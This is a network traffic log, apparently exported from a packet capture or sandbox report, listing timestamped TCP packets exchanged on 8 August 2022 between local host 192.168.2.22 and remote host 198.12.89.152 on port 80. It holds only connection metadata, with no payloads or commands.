Aug 8, 2022 17:26:51.260782957 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260791063 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.260797977 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260807991 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.260812998 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260828972 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260829926 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.260843992 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260848999 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.260860920 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260864973 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.260875940 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260883093 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.260893106 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260899067 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.260909081 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260921001 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.260925055 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260936975 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.260941982 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260957003 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260958910 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.260973930 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.260976076 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.260994911 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.261012077 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.261550903 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.374938965 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.374979019 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.375003099 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.375024080 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.375041962 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.375058889 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.375073910 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.375089884 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.375149012 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.376143932 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.376179934 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.376199007 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.376220942 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.376219988 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.376240969 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.376247883 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.376256943 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.376272917 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.376288891 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.376295090 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.376305103 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.376319885 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.376321077 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.376331091 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.376338005 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.376348019 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.376353025 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.376368999 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.376368999 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.376384974 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.376389027 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.376400948 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.376405001 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.376415968 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.376422882 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.376431942 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.376437902 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.376449108 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.376456976 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.376465082 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.376471043 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.376482010 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.376487970 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.376497984 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.376506090 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.376513004 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.376522064 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.376529932 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.376538038 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.376545906 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.376555920 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.376562119 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.376573086 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.376578093 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.376593113 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.376593113 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.376610041 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.376611948 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.376626968 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.376631021 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.376641989 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.376650095 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.376657963 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.376666069 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.376683950 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.376701117 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.376734018 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.376751900 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.376768112 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.376774073 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.376784086 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.376791954 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.376801014 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.376811028 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.376827002 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.376832962 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.376843929 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.376863956 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.376873970 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.376895905 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.376909971 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.376915932 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.376933098 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.376951933 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.377592087 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.489692926 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.489721060 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.489738941 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.489756107 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.489770889 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.489778996 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.489787102 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.489809036 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.489815950 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.489840984 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.492501020 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.492530107 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.492546082 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.492577076 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.492593050 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.492640972 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.492645979 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.492665052 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.492676973 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.492680073 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.492696047 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.492717028 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.492733955 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.492752075 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.492769003 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.492782116 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.492793083 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.492810965 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.492830038 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.492856979 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.492875099 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.492891073 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.492899895 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.492907047 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.492918968 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.492923021 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.492938042 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.492939949 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.492954016 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.492960930 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.492969990 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.492988110 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.492989063 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493000031 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.493020058 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.493110895 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493129015 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493144035 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493159056 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.493164062 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493179083 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493181944 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.493195057 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493201017 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.493218899 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.493226051 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493240118 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.493242979 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493259907 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493263006 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.493275881 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493280888 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.493290901 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493300915 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.493321896 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.493336916 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.493350029 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493366957 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493381977 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493391037 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.493396997 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493408918 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.493413925 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493433952 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.493451118 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.493494987 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493511915 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493527889 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493535042 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.493542910 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493555069 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.493560076 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493576050 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493577957 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.493592978 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493602037 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.493608952 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493617058 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.493623972 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493634939 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.493639946 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493654966 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493659973 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.493671894 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493686914 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493701935 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493705034 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.493716955 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493726969 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.493732929 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493748903 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493750095 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.493767977 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493772984 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.493784904 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493798018 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.493801117 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493818045 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493823051 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.493834019 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493838072 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.493849993 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493859053 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.493868113 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493877888 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.493884087 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493896961 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.493900061 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493916035 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493921041 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.493931055 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493942022 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.493947029 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493957996 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.493962049 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493978024 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.493983030 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.493994951 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.494002104 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.494010925 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.494020939 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.494026899 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.494043112 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.494045973 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.494057894 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.494074106 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.494082928 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.494090080 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.494105101 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.494108915 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.494119883 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.494127035 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.494148970 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.494165897 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.494534016 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.604445934 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.604482889 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.604501009 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.604522943 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.604532003 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.604542971 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.604554892 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.604559898 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.604577065 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.604581118 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.604590893 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.604604006 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.604615927 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.604628086 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.604645967 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.604701042 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.605336905 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607135057 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607175112 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607197046 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607202053 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607222080 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607225895 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607235909 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607248068 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607268095 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607275963 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607284069 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607292891 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607301950 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607316971 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607336044 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607337952 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607377052 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607378960 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607382059 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607395887 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607415915 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607420921 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607435942 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607436895 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607455969 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607455969 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607471943 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607475996 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607491016 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607491970 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607508898 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607515097 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607527018 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607532978 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607546091 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607553959 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607563972 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607573986 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607589006 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607592106 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607609987 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607609987 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607625961 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607626915 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607642889 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607644081 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607661009 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607661963 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607676029 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607681036 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607692003 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607698917 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607707024 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607714891 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607722044 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607732058 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607738018 CEST	80	49179	198.12.89.152	192.168.2.22
Aug 8, 2022 17:26:51.607748032 CEST	49179	80	192.168.2.22	198.12.89.152
Aug 8, 2022 17:26:51.607753038 CEST	80	49179	198.12.89.152	192.168.2.22
